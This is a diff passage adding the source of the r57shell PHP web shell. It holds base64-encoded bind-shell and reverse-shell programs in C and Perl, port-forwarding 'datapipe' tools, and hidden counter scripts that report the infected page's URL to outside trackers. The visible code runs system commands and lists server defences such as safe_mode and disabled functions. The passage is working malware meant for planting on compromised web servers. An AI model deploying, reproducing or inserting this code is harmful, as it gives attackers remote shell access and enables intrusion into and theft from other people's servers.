+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "";
+@readfile ("");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
